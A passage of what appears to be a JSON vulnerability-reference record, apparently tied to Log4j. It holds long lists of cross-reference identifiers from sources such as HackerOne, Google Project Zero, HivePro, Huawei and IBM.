"C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C96865D9-B80D-5799-9EB6-DDF13650F0AA", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "CF96C0AC-16EB-57DE-B450-775CC256F1C2", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D107A97F-1C44-59AB-8FFE-803D1DC21EA3", "D1E393B9-589D-5A20-8799-0F762FD361DA", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D536CD4F-33F2-570F-BA34-54E141F1132C", "D64C04EA-093F-5924-A39B-714908D4637E", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D813949A-183D-55ED-AF64-B130B8F95A56", "D8246B9C-AC86-5FFA-AA8F-4419E4CD07F1", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "DE88B6AE-5D54-5B49-A097-57038C720463", "DECBAC7B-9235-5E00-81C1-142CD41306FB", "DEE433F2-3A1C-513B-AE6B-E11EFFB5A8E4", "DFF2F784-9ED2-50EF-B79E-3EBF5A9B5428", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E06577DB-A581-55E1-968E-81430C294A84", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E4103A50-881C-52BB-86CC-27F549B798E9", "E4491698-477C-599A-A65D-EBA7441764E9", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E981B35D-7356-5A5A-963A-744545A4E51C", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F493C59E-F2A7-52D1-B4B5-69CD3748C5E9", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F50E9F2C-8C80-5A76-A993-A3E42414D797", "F523E799-3659-532F-8EED-40AD7F79E752", "F594470D-2599-5B2E-B317-C9720581C07D", "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "FD364396-D660-5D23-8323-23248A5108C5", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD", "FF761088-559C-5E71-A5CD-196D4E4571B8"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1423496", "H1:1425474", "H1:1427589", "H1:1429014", "H1:1438393"]}, {"type": "hivepro", "idList": ["HIVEPRO:0D02D133141B167E9F03F4AC4CA5579A", "HIVEPRO:205916945365E4C9EB9829951A82295A", "HIVEPRO:310F7AA9457FF55D42E100B468844E6D", "HIVEPRO:5339CBE01BD312A79B81CAAEE0F3B32E", "HIVEPRO:57EAE0D1FD9EA88C12142AFF641985C3", "HIVEPRO:B25417250BE7F8A7BBB1186F85A865F9", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:C037186E3B2166871D34825A7A6719EE", "HIVEPRO:E57DA2FED4B890B898EFA2B68C657043"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "ibm", "idList": ["004795EC88EC224A6BFB93940B96344B4EB9FAFDD91D056225AB0FB24FFE6CFE", "00B8C97EE29C4817481434B7FD887049A0EA42C49E5514E1877ED97B5322DB16", "00CA973D0D5F4A08ADB77D27F66CF53D661D1B67B8DA263B3CE4522918A4CFFF", "0172701FE5FE7C060372C9A6E7199B0E91A4F7E5904E7762F54202A8D4CB9759", "01C1A66F149F6CC650556CCBE7E381780D3142691366A6B6EFBC8CD5C674BD4D", "023C54E1D297D5AA9E7F44F8089DE35CB079281FA1776467BF8B7A7AD4FE252E", "03991456EAB03B09B39DC9DB5C8BE4A51167523943AA9AE61168FCD6FBACC80B", "03FB798F067FAF41EB009C69979886C89AC88567ECBC9DAD159CDC2AB547C1F7", "048C762AAACAFC74604EFAB15A41479F902FA040758DF428CB364B0242E01EE5", "04D3658F043D6F4A2AA1B2F519A7E89C112641C7C4E2E58E14BEC11BA66E803D", "053134070CB8D6609B7F157DC74146FFBCB3EBE941406A677E889C3CAF773364", "05A1D58708802BF8C1674EE32BEC4344254929330218CAD68AA838AA7F549BF7", "05BBDE1FB03AC43275CE3464D408E5E21E63D250E7B0CF0E90D314FBD5991752", "05C0F0FFAAC20F511D50030C8EC7ECBE67EB162A7352C90C63F986E1F73F829F", "05C433115EE2DEF62DD69CA7C7E97FF424FB6D815F82B8FFDD0435DD323AC60F", "05DC2B42328B1D8271D4FF358EC4A58529E6A6A6B8D7E154A691EFE1CCE81D1A", "07F48EB2EFD881D21294E1AFEEE704414B9605E4B9B1F4BF6C82B1917372C2B8", "084618FE115DBC963CDA469EFDF156D77B5FAF5BE04B99575716D75AE5C42F9B", "08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "08FF14BF18D2D8DEA2BCD9900A4BED9C481C9700F7CF99B6CD1B3F7EDA9C3865", "092A442A77CDFE46ED83F2F7A7AEC07007442443AE7B6D28BB557D1A8FE3BBB2", "09E2EB771A00246F88812FA7239EC135B4D760017A61975C9C7DFACAB2B566B3", "0A50FDB1D7E17C09815A2D06C237539FFD67E23789BDD9A730E5EB3DD9473349", "0A6CCE42A31E930F28AFDE0602BBBC571E0114C6DE44000B246AC3D8A844DE39", "0AE80E7D1B92F5584C0652988A6BC58F1CE1E37349CB543C23A7BCE8C2445CCD", "0B0C1C8C8CE115B4178E3F36D545ECA410D6199928FD71C89DC4DE93BB9DDD9F", "0B7D327E5943F8BAC5B2E5CC855F0062D08A51BF03FA3BB29C4B6E081796EE73", "0C1804CEEC31BC3891CD11D25C3FF5366F208C6C862263628223F5F36164CF5F", "0C5DF0032AED817AD90450244E2BACA3580BEA79A5DBA7B84BC329B4F1B22585", "0D6234D366BD8E5B02C4B7507046A503B63D0B4B38E06DEEBC5B6B98A5E2C80E", "0FEC88A4274D91DBFBCE46AE5EAF1CC67B908E3D943BD3504E2985D9090BF93C", "0FEF4738C59C97322DBD25A9806D1EE3E131F117AF9CA9C33F3A6098A981AE66", "10DF4536D86919652FFFFF08E8AC284AF696E6684CAF921DD9F5AB335A3882A9", "10DF54AA6E02F56E5A696B90CA92AA8E0E7F033CECD731E6AF976A827BD42316", "11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B", "127C76472291CDD3CB521ED83F3C5EE611A0DBD9FFDB39D76C830FEB168F09A4", "129CE78870CF5A56320BA28A8E839DC00636BEBEF434ACBBC173D76B086059A6", "12B5FC796651D7A35DCF3B8B99675B867D7E526A689762A16A5B6315936577BB", "1310B3EFA1CB8221444DBC5BA49E64CF94DE9CAEC7263EBE35877FDC59E5AC3F", "1344237EA4CB2FC0E4E886077C19B07F9DB7272438002709C5CF339D588A226A", "13F541CB7E471297DBC119C027DC6613DDB93B7E6EC8CAAB1918D4F75B9B0A25", "1449AEBCE14C7A0A52FEC9AC77DB499F51B4D1779EECBB859DE1E3343B21DE81", "1564B346628009160A0396828F83A178C5F24808FA0E2904A4DA0F9DD72C42DE", "15A287A106B845D07333D01887C3D8023917F0A2AED2934387D8904CA8A42DA3", "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "1718BBC548F6B9290910114BC5C00A77714052D125CB0F46088F37430F68E717", "1827A1B8985F4A2B91EE262D4C17EF01B71CFEA86DB0A386BD1C1B098E2F4B69", "18433120583E82C639DDC6BF1D76EF365C9C500B0A9CC0AE663BA4BE32DC9232", "18578ECA481CB003C14A84CA7A47ACA060F579C24F4075A776AF26B575502960", "185EAAB4DDC8472DF44603A1F8F5361C61E9CD92D640BE3D1EC6D31AE959C4F0", "18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", "19613990614CDAB7F34154F3A620BBF18E7F15F79F3D35FBEB7EC2FC9249AD2C", "198E2723EA7A1CE1B7B95165E39923D5EC8AC5F2D17849CEEDD3695D8CF40623", "19BDC8BC083D06551FAAFFE502D5430968A9B28E5C71827BCFA873F30BA60815", "19DD6BC826C8BB8D144E5985E9EA9E8E00533CC7AEA127F00BAC78AFBE98ED00", "1B24B80EE0365FFF7DD17D658867C0FAF5A2D298D0CEFC01C750A9D3A2948965", "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "1D2ACD2E26FAAB07F4713510046DB56AE9A2584306D1B3C884E18DC47771F892", "1F4AD6C45C3008DFF01BE9EE1718E1541E761D5A4D77198ECEBE3A97CBCEF6FA", "1F7D1DABE3F10F804A14788D638556B04F5D5038E1088B9F38B3961987623815", "2042D81324560EA3A6747DAF5E2633EFD4EC3C4BB62989E7EF2C6A1F73035677", "207BA1F7EAE0F24909102A8E9F71F4E090F16E370A882E1CE68B1B6EFB5952F4", "209DDCAB6F475A868DA84DD19D31132027FF62B259B6541CA0C9859AD7CF6ED3", "231A52BDE442B2AB4C8738E8A5DA147B21BA8A7C7B8F0AE7764349AD467647ED", "23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE", "23AE54815D4CF73296F6842E5DC0E74807A9DBD435A1F78F1FCEB4A6582B9613", "256D7977365CD514F903FC0D0240FD89D47444B078D35EB3DA4DD54AAC8C8661", "261D21204C9E2060DE70CAB5932236C5EFB2EE37E8BD5A2C64CC6F1DFE9C5D11", "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "28932A2B46E12EA86EB64762E53A114C7EAE97254E4818FFBB7E3706DCBD4C0F", "29D0DF01470BDC8419B05A248E7472C3D66A25942620A36BE340FC58780F85D4", "2C91E3B2FEF04BCEF23F12290F03A43D58EEE4E79946072B4CD9E132F31D3891", "2E43FFB94818B9FA5C94DA88B4D321908359974CB3975DC266C2CC995ACB39F3", "2F83AABA00B663AFEF63A77633BECC48724170228D80CF284B2FA6A8E71FE2F8", "3013E3EDD3900D973C5458C7115888BA961C479A9EB9DA6399CA9B389B37A68A", "30495EE9B3C48AB51AC589D2A5956D977474A3BCCB9A67B54801DEE7685C5573", "30B9050919D7C39431AC5338C16936C21A40D07623E5A2722246A5F91B5C6781", "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "31818542FEE3EBA05F196E3245AADB3A27506A9391A7E39DC666A3A5AAEE4963", "3220BFD68D0CE5B97E4EC49AFAD94FC9317DA5DFDBD73C624B022C3E93AC4268", "342C70DE6943237DCB4E2BCA66A117A8AC4A929DA3631A2BB88E27D99C1A1F68", "34A1BC83BF19906C7B478BA74801364559DCACB160B8635E7EB96D184FEF89D3", "37EB0FBFC18EAA8CBA405BA4A0486007287891F661D591E70F8DFD893065763F", "382442D01890BE0F397DB0132A6B09339C6A137724C837A5E2907ACB61EA374D", "3976D01F8C3788737A665B8B2C67DBBC91A5E249602308AB620D7FB7082293F3", "39C439A440712A8825FAF249AE9256D154F422331B554EA4FEF0A1953F90EEE0", "3DD98F75D577A590F9C6B1044AA5212C3724660A7C7FB06B6DA4B25B95BAE35A", "3E89F6F868ACED4017A55BB54A40658D10E6704003F50ACBCE289C1637B41045", "3F22D484EEB21B0ECFBCEC72BC808CC13691870E90AFA5724963DAB7B31EAE45", "3F4820A3C64022355AE6B658B22CB04D75AF98980AA0D9E31E518E440502939E", "40793F706E8E7D40E73D53F66523BA8AE8718C40C00FCEF117CE8DEAC4566FD6", "4204EAC341D63510AAFE13D5F22BA14E92396D43569176E371BFB452611D1A97", "4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B", "42CCD08061313E58CD6A73C8392806C80452EF564A9B5297EAD78887E47150D7", "42E2A358194D10969A587E1619263DAF26CB9ED7B107D2DF24882326792073A6", "42EDAFE6D8936EF20A9D2196EA720167F87C6E003FF3677093C777BD76F87321", "4444CE19278AF3B6D6D733CB7C56652494A379ADDF5788A2D704DCF2AF8B12B6", "4490A508C76B3478285658D50CD1591EE7BF09C6C6CB543CD3B4AD02093F6106", "472B90C1832448CA528B9FB0B6A4E81CAB1388397DE753F5CD640C5D7396EC9B", "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "4AE1D41640E1E1F9FB5DBE7DBF0EE0C2ACA27C0ECF4C914440CCDB95D27308F5", "4AF3F2925FA2FAC4247303F748E1EABFA2DFEF4045F7C3DA1E06B8C833F40639", "4C80B96CCF860D1EC965D20D607161A663C8FEDCCC81B5243439A21264518261", "4D6D019876F2EE83F308FCD9E27F7FE176603A605EC9CDF1DBCD5C5C9951EDE5", "4DCA21B56FE99A5E5A697112CA49F4F2144DF92AA26A0776EAADF3EDAC9C9053", "4E45A4CCE496D5E81C322B32A8275068E422B799EBDE7BAED299E58F52295C89", "4E7048D2949BF25810D29EF0126BEB63CEE9FB2EFA940D8D15F1A2EA9579215D", "4EADDF94DBE666E2A4821F37D1326BE41E94E92E6E6B1A8834D7F3C47C803887", "4EB30F982289A93326697168C61CCD073ED91E21FFACB7414B6EA10DBFA0E2B0", "4FB8B888437D1D3BA8267655720E593D70AA3798247EDD900F18FB420753B17B", "4FBB5FAC2DC58E004CD52875DF4CDC0625DBFB20A2AD61A597C719C2C2B0ECAE", "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E", "53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B", "548C926066F6AD2176268ED770911E39A8F8EF2D79582E0A4D8DDE7F34549084", "558ED6F880AE90E6CA233933ED947E6F8B2EFF2613CBD4FECB6553DBCB9609BA", "55BBC53EEE4090294470AC417A4B8BDE9A26DF232DDD5FC327A46034AF09FE38", "5662007982BBB6B88D91C6C7393CC2022D9415D2290FD0DA76D55E99204FFF35", "5815FB6A93B31EE44428DCA7206EFD79ECDE693494B2D5F28EA2CF1909915C77", "58868A8A56E187AE7CFDC0168A9534F5C483AC0F042B7ADF09CCBE3D8A901101", "59E669B8BB67D676E7382F77EAD621E08DFCFBF626C52F337A77A33EF6F33748", "5A77C3590D23BFD85FBC46CAC465870596841D78EFCD8AD2320EF501E87B107A", "5C1515C744F7537118B0717D85B52611810BBDF6206930989FA3E05682B9BEC8", "5C2309A832A981E871A38D52C9E19A6D60138A5FF04933E55F3319A964A350A7", "5C4285711D841C9680531DE8ADF4E9F871797CE3D4CE7073D4D1B7D69166DABE", "5C78D16785206BA3DE0656E1DA67E30BC720F22BB98882FCD6029110F7F105E2", "5CCDFC397B134AA5DCE5EBE10022C85B3EE99DAF9D679B25DCCA69CA3D851EBF", "5D4E57B88DA114CC1637B260294F38F53CF8C7CCF19B1E4FEF1E5735A6EC78DC", "5DC028B7AB8CCCA9FD3F109B69D7F7AEBDC718A32C0EC71E5693C99FFB06466E", "5E0D2EC541C3D2FE5413DA829783950147FE05FA866060FB6B6B557BC4E00A16", "5E46685CCFDAFEF52C3BC0BE649F5DFE9485392CF7A7733CC64B02CFBA707DF4", "5EB805FBA32A419246DDD86FFCA6C34246C092FCBCD8608B3ABC4B0A77FFDAA2", "5ED570DDC2DC18EDBE3A6F896450F75892C392B6E12D967BD6C8F6E5EB0809E5", "5EE7E4E97581573D0B40454E7851D662668050B8C7587DA918FD85D38B92C2A2", "5F247DF8011234E4C8E9F5DA1233AD5131F7718B99D13FA0E448AB8545E5E6F8", "5F24F58173ED799EACD7F7DC971D2ECB62B80971453D92D5DB9CA708526DE3A8", "5F61B9F9A964CB3CBB554CD28E3CE9FF36CED8CD1357DB2E45299E1C329C251A", "5FAA10ECBDD6BDD67568DC782206BEA34BD7120E44FD8D30001A968A438E5C77", "60679F1EB565A827FBFDD72C9C325755586FDA1F0AC78877A6590DED78230E66", "628B14B8AA20DB98F73DABE8C7FF0C2746646BE602A0BA4F638FBEE3E634C393", "62D22CE7464E30931544D86043D72A241CA4A2ED1A6F28AB59EEDEFFCBBFFAAB", "6305882E456CC7111E361249970AB42E196A23084AAFDDE2E82B0694295074BC", "65B30A5B63DE43E789127C5F5AD2977C7194142636581876B7BA2AE224B6420B", "6741052F2A7BCCF76F84825C9FE706D98BCF279A0C055A783796DC802C323E13", "6758FD589A76487DB6421ACF317F7E42F52C2C62336F671B43C2B523483BF57E", "67B2FFD11F790787A36E0394080502A01EE907D975E33ADFF6E931A0E15B05F7", "67D7A2AD6D196C643D91F066E834B1EB9853338990881AE1012D2B5186629622", "67EEDC4E808A4DC3E092C0FD2F6DFB5714B1E7F2E2ECD7CE2F8B2F65F2D2B26F", "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "6920277579A35875812264472A148A4383E98310C21147950644BE922AD17700", "6A43E45FE98A49A0127D4FD81A7F70BC513609043DDA830926C4CD80286B1A17", "6ADEAF325A5B46B34D6E419B67D91A45C9FD7E4F02587AF0F33D5FF933653E27", "6CB020CE84694787BB12E05DCB6CC95C33681B735ED0D48ED68FF5A99DD1D7A4", "6CC386F9299ECFE5F62C9D0954CED9917B32A3DFEB8BC98C8212D83DD7B53DF6", "6DD517DD7F557A31BB9EF8B8E2970701E7EBF9E1168A77A02C5EFC57A29C1AE3", "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "6FBF074F8D8E8E6000FCF6488B84CA43AEFB7DEF10B2CEFF0E7D0AE1140ADA41", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "7156D43131599F71B03A8F8BDCE4755976A54F82BE32B0AEF105D1E6E781F384", "7295DCCE494A2CA195C0EC2BD4F052B62F3E1B45826D03ABBF986B81F58BDD31", "72E392728BCA627E900CA46B892A2B86465C877D468139416A39573D2D6C73F6", "73781BC7A0CCEF128DBC5E169F177E52BD5AD843F08787EBE0E19CC9088C2FA9", "745004E6A8DD36244AE3AE2E238FB3CA9F40B885C5F912CA9FBBD7A9FEE76248", "7473C0056DBBEF7C541ECDFB31E947DC1520282F5E0172B7C965A9DECA661856", "747C7023F8D283A88FE9778F37629C7BF2E2A7E5268A695905F9F28590BF76D3", "7566B2B0BD8AE66EDD74AA6296BA3C094CC3661C2B4C3EADB69127C0EBE5A710", "76FC3815A1052A74CFCD99C9C0F5C1F4FA7C289E70171A7BA16DE2B8E6DA736B", "77486B8B5BB16D0AE922BE517509C1AEDA2019428A2A23BADFAE5682D363F74A", "77C0F01606E7883D65A2981E1E5DAEA1712E790E6D5528DDD17691C666E43D15", "78230A0FDE17E1A4791590999547D790CF1340A3123CA146452B6C92AF70CA24", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7A1D4AFC62D444E93951F6A46CA35876DD42680BFCB9DD562AE0F80A2C338D67", "7A36E54AFF586A013BFC64E0308098C6070D7FE82FD631B59758E4F661D42586", "7AA351B847C7732E8B7AE01A83A77CC863325C3B53A57FDDE54F4DF8D16D14C1", "7B60DE546B91D3886C995A5DE16291DEDDA95C96FC984BD69B852CF111B4C102", "7CE0B3947D8196985B00E6EB61ED45938560312360058DDC3063CF3D7BE03A81", "7D3ECDDF0FEF31AB10959BE94A3F76C4BE4F6CA1CC52373D0E460C5CA46E24A8", "7DDD006076946810EADC174FC2320565F527D46FFF5270A3D6916BF8993B12F9", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E2A7C8E981FCA78A12F6D8992BE35354D42B960D223A90BF210EE5B300BFB9E", "7E4FF868DFA0F4BDAEDFDEB60188A16AB82AC45AB8EB35F1D260229F12C10341", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "800A58A21DE4F630ECEAAA1932A596AE5A4743CB06907F342619D1D7ACD5AB64", "801604295C016952DB2E8049DC0524C86569A636C5BC867E0FB7565B433600F8", "818495FB1C54B71E6C7753464B1C7C2926402C76844055039753A11157B24B81", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "822A5D5DDFBAB14222D402C61CEAC1259D980506DB6102BD80EB619551AE1961", "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "86B15422FEE58FE9F2F1B22520453D09FFA84C6049446DCE8467C766E3B57967", "88119FF28113E384895FADEA63C7ABC2906571B02A874CF9D50260071AD58FB7", "889513D802A76507558C54C040010996613C8881A261DD9C7C561CA24A30140B", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8A368F9B7240AEC7A45518B26EE613BFEF287DD9E106138A5AD63F4D494034D6", "8A9E980FE740F4424FB663C857EE84E39154A02964A02540A3A74E4A80F058EE", "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "8B49BD8B4756373645F1A1DA4BC3E31D1FE7BF1F5A0706A9665EE61D5A4B1419", "8C8A687167096A3D2AA73F94AC7D6F1C43EF830C110ED1F9406D92FAD9FCBA59", "8D4EDC587A369AADC2A4B4B6CA60C94602327216807E8B71042463A2BF381325", "8E3EC3A49910FD61ADB4E5FDC225B58A74D0BA57105F3D9A6F1B3E46361C1307", "8E5EB05CFB883D682B3A2C7D645375420476C4616183B915FE43ADDF8FA697A1", "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "924D425FFD71097B50917C124D87FAE558BFB3C7DAEF1BEA09CE12CCD6B264B3", "92A25ACC7CA97D427DA5F098FEAD958217F50C6C07BA13888E0C08A046DD5DA3", "932EB6FF0C79CFA010373B06A99AA8906C2B3B3171A0D96A0399EF72EC35ED11", "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "94633A31471B22DF4D1E9508BA6DE360B6D37FAD329018F21926F838DAF45AB4", "964A048B00AF3D409A4AA83094E36431FA7631859A2D4595D2F53EE838A705E3", "976356D0F193356D662AC659E8578D3D0CC6C5711EA8A61D28A63CCA919F9900", "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "99D36C5A3B6C3FF496422C3FF600B7D254E5D81D1CC0F9184ECD1F8F03423FCD", "9B0F66C4EFFAAF9FDB1B504C2B624740D85D778570BFE202D803740E0C99076C", "9BBA472DF522BDB11A0F80EDDE168630BF88A9C15518FEE66140BBEE5585001A", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9DA9D6C05FE03758B84DC068193CB0E2A82B2F411E24F383722448967D77B355", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "9F34E4D3B1044507E18917B1E2BE1AF6051A228EE5F8F69E5539B48FDFAF3B4D", "A060C0BC5CF92D0F7B8D81075A33D4E2887EE843B41F417A28EC2BBAB72FCED9", "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "A264D72AF012C33CABCDEE09605EBB277263FB33567A89DC0831C44257A7E37C", "A31AAAB46398C4CA9F3552FA53EB3F0DB8FD1384559E2048B5321E5BB6936FB2", "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "A5803C821BBFCE3CF61C99A5753B13549E824EAC069265D225FFBDF6B568BCDB", "A61564D752A2637A5306DF51328148AB1D1EAAC0735226DD1D9F500C5DAECC37", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AAB14D78054A85A0638FC4EFD7F09686429CB02C6B45FF1ECAFA55C27A050635", "AB8881439FA512D752063B5AB323E9C076039DB482070536304B448AE092D8CD", "ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", "B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", 